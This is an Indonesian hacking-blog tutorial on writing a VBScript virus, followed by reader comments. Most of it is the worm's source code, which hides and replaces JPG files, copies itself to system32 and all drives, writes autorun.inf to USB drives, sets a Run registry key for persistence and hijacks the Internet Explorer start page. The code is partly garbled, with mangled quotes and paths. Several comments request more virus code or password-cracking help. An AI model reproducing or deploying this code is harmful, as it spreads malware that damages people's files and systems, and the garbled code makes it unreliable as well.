Home / Virus / Cara Membuat Virus Dengan Visual Basic
black-hat-logo

Cara Membuat Virus Dengan Visual Basic

Cara Membuat Virus Menggunakan Visual Basic (VB)

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer

Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas

Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub

2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.

Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub

3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan

Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub

4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus

Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub

5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus

Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur

On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()

Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “KONYOL”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.

Source: c o k e l a t n e t[dot]b l  o g s p o t[dot] c o m

Silakan Ber Eksperimen Dengan Ide-Ide yang lain, Cheers..

Jangan lupa untuk sharing kepada yang lain ya 🙂

About BinusHacker

Check Also

malware-api-winapi-binushacker

Kumpulan Fungsi WinAPI Pada Malware

Virus, Worm, Trojan, Spyware dan sebagainya yang termasuk kategori Malware atau malicious software mungkin sering …

57 comments

  1. Bang mnta cara buat virus Ÿª♌g lengkap nya
    Sma cara buat penawar nya
    ‎⌣»⌣͡«̊͡♡̊͡»̊͡♥͡Thank You ♥͡ «̊͡♡̊͡»̊͡⌣͡«. Info nya…

  2. mas, mau nanya neh, itu sub serangan nya kan JPG, sedangkan ada lagi jenis serangan lain misalkan folder dan drive, nah, serangan lain itu apakah tempat mencari file sub serangan JPG atau menginfeksi keseluruhan file dalam folder atau drive itu?
    mohon di jawab… ^_^

  3. Inimah Masih terlalu biasa,, Punya saya kalau di tularin otomatis ngehapus File system.. terlebih khusus ke data2 booting… dan OS.. dijamin Pc / laptop Anda yb memakai OS win 7 gag bakal selamat kalo kena virus saya….. gag langsung kerasa… mulai menghapusnya dikit2..

    ======>>>>>> Anda bisa Stresss <<<<<<<========

    unload me

  4. Private sub Bantai()
    **************
    *************************
    ********************************
    ****************************
    x=msgbox “Data Anda Akan Segera Terbantai”,vbYesNo+vbexlamation,”Warning”
    if x = ybyes then
    ****************************
    ******
    shell(shutdown -r -t00)
    *****************
    *****************
    else
    msgbox “Mampossssss”,,”wkwkkw”
    exit sub
    end sub

    Yg mau tau kodingnya sms ke 085284863654
    Saya bisa kasi tau cara bikin Penangkalnya Juga kikikiikkiki 😀

  5. makasih mas dengan artikelnya saya berharap saya bisa pintar seperti mas
    oy mas saya pengen nanya cara membobol password winxp gimana mas ?
    nanti jawabanya di kirim aja di email aku pmandala40@yahoo.co.id

  6. Kamu pintar, sayang kepintaran diarahkan untuk membuat yang negatif, andai saja anda membuat aplikasi itu untuk menangkal semua virus yang ada, bukan menciptakan virus,…

    Selain kamu mengembangkan kepintaran, saya yakin ilmu kamu akan menjadi suatu amal yang berguna jika diarahkan ke hal yang lebih berguna. Tanpa disadari kamu akan di doakan panjang umur dan artikel kamu akan selalu di nanti karena semua pihak merasa diuntungkan.

  7. Mas tolong kririmin codingan virus’a dong dna sekalian anti virus’a yah

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *